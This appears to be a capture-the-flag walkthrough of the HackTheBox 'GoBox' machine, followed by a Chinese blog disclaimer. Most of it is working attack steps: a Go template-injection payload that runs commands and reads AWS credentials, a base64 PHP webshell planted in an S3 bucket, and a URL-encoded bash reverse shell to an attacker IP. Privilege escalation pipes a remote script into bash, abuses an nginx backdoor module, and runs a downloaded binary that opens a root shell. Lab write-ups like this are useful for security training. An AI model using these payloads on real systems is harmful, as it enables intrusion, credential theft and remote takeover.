Information Gathering

$ ip='10.10.11.113'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8f5efd2d3f98dadc6cf24859426ef7a (RSA)
|   256 463d6bcba819eb6ad06886948673e172 (ECDSA)
|_  256 7032d7e377c14acf472adee5087af87a (ED25519)
80/tcp   open  http    nginx
|_http-title: Hacking eSports | {{.Title}}
4566/tcp open  http    nginx
|_http-title: 403 Forbidden
8080/tcp open  http    nginx
|_http-title: Hacking eSports | Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Golang SSTI

# echo '10.10.11.113 gobox.htb'>>/etc/hosts

http://gobox.htb/

http://gobox.htb:8080/

$ curl http://gobox.htb:8080 -v

POST /forgot/ HTTP/1.1
Host: gobox.htb:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://gobox.htb:8080
Connection: close
Referer: http://gobox.htb:8080/forgot/
Upgrade-Insecure-Requests: 1

email={{ . }}

username:ippsec@hacking.esports
password:ippsSecretPassword

AWS S3 buckets

email={{ .DebugCmd "hostname" }}

email={{ .DebugCmd "ls ~ -la" }}

email={{ .DebugCmd "cat ~/.aws/*" }}

aws_access_key_id=SXBwc2VjIFdhcyBIZXJlIC0tIFVsdGltYXRlIEhhY2tpbmcgQ2hhbXBpb25zaGlwIC0gSGFja1RoZUJveCAtIEhhY2tpbmdFc3BvcnRz
aws_secret_access_key=SXBwc2VjIFdhcyBIZXJlIC0tIFVsdGltYXRlIEhhY2tpbmcgQ2hhbXBpb25zaGlwIC0gSGFja1RoZUJveCAtIEhhY2tpbmdFc3BvcnRz

1.列出 S3 存储桶

email={{ .DebugCmd "aws s3api list-buckets" }}

email={{ .DebugCmd "aws s3 ls s3://website" }}

email={{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUWydzaGVsbCddKTsgPz4K | base64 -d > /tmp/shell.php" }}

2.将webshell移到website存储桶

email={{ .DebugCmd "aws s3 cp /tmp/shell.php s3://website/shell.php" }}

$ curl 'http://gobox.htb/shell.php?shell=id'

$ curl 'http://gobox.htb/shell.php?shell=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%36%2e%33%33%2f%31%30%30%33%32%20%30%3e%26%31%27'

User.txt

b3fe16c3ec3d2d2e65faac130f0f2498

Privilege Escalation:NginxExecute Backdoor (ngx_http_execute_module.so) && Tyrant

https://raw.githubusercontent.com/MartinxMax/KTOR/refs/heads/main/ktor.sh

www-data@gobox:~$ curl http://10.10.16.33/ktor.sh|bash -s -- -l -p all

www-data@gobox:~$ strings /usr/share/nginx/modules/ngx_http_execute_module.so| grep run

www-data@gobox:~$ curl -g "http://127.0.0.1:8000/?ippsec.run[id]"

https://github.com/MartinxMax/Tyrant

www-data@gobox:~$ curl http://10.10.16.33/base/tyrant -o /tmp/tyrant
www-data@gobox:~$ curl -g "http://127.0.0.1:8000/?ippsec.run[chmod +x /tmp/tyrant;/tmp/tyrant]"

www-data@gobox:~$ /tmp/tyrant -uid 0 -rhost 10.10.16.33 -rport 443

Root.txt

d6d6a6ab1e9439036b7901dd8ccd1d55

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）